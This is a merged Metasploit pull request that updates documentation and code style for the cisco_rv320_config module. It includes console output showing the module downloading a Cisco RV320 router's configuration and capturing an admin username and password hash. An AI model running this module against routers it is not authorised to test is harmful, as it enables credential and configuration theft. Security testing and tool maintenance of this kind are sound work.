### PR TITLE
cisco_rv320_config: Updated documentation and code style

### PR DESCRIPTION
**Pull request by asoto-r7**
As `cisco_rv320_config` was a hackathon effort, there were some documentation flaws and code style issues that slipped through.  Thanks to feedback from the team, I'd like to make a few quick changes.  No features or functionality is changed here.

## Verification

This module has been tested by @asoto-r7.  See below.

- [x] Start `msfconsole`
- [x] `use auxiliary/gather/cisco_rv320_config`
- [x] `set RHOSTS 192.168.1.1`
- [x] `run`
- [x] Review documentation changes: [diff here](https://github.com/rapid7/metasploit-framework/pull/11399/files?short_path=aa034b3#diff-aa034b3d5bec6097cf6eca8f723caf23)

## Test output

```
msf5 > use auxiliary/gather/cisco_rv320_config 
msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf5 auxiliary(gather/cisco_rv320_config) > run

[+] Stored configuration (128649 bytes) to /home/administrator/.msf4/loot/20190213155757_default_192.168.1.1_cisco.rv.config_701669.txt
[*] Auxiliary module execution completed
msf5 auxiliary(gather/cisco_rv320_config) > hosts

Hosts
=====

address      mac                name          os_name  os_flavor  os_sp  purpose  info  comments
-------      ---                ----          -------  ---------  -----  -------  ----  --------
192.168.1.1  70:E4:22:94:E7:20  router94e720  Cisco    RV320                            

msf5 auxiliary(gather/cisco_rv320_config) > creds
Credentials
===========

host         origin       service          public  private                            realm  private_type
----         ------       -------          ------  -------                            -----  ------------
192.168.1.1  192.168.1.1  443/tcp (https)  cisco   $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/         Nonreplayable hash

msf5 auxiliary(gather/cisco_rv320_config) > loot

Loot
====

host         service  type             name  content     info  path
----         -------  ----             ----  -------     ----  ----
192.168.1.1           cisco.rv.config        text/plain        /home/administrator/.msf4/loot/20190213155944_default_192.168.1.1_cisco.rv.config_776168.txt
```

### CODE REVIEW

File: documentation/modules/auxiliary/gather/cisco_rv320_config.md [hunk 1]
```diff
@@ -41,13 +41,13 @@ msf5 auxiliary(gather/cisco_rv320_config) > run
...
-#### Against firmware version 1.4.2.15, on the WAN side, port 8007:
+#### Against firmware version 1.4.2.15, on the WAN interface, port 8007:
 
 ```
 msf5 >
 msf5 > use auxiliary/gather/cisco_rv320_config
-msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 172.16.0.34
-RHOSTS => 192.168.1.1
+msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 203.0.113.54
+RHOSTS => 203.0.113.54
```
Comment (hwilson-r7) [inline documentation/modules/auxiliary/gather/cisco_rv320_config.md]: Loot IP update?

Comment (hwilson-r7) [reply documentation/modules/auxiliary/gather/cisco_rv320_config.md]: And now this comment is outdated... sorry! :D

**Comment by asoto-r7** [comment]
These suggested changes are courtesy of @hwilson-r7!

Thanks for the code and documentation review!  :pray:

**Comment by wvu-r7** [comment]
# Release Notes

This updates the `auxiliary/gather/cisco_rv320_config` module with documentation and code style changes.

**Pull request merged**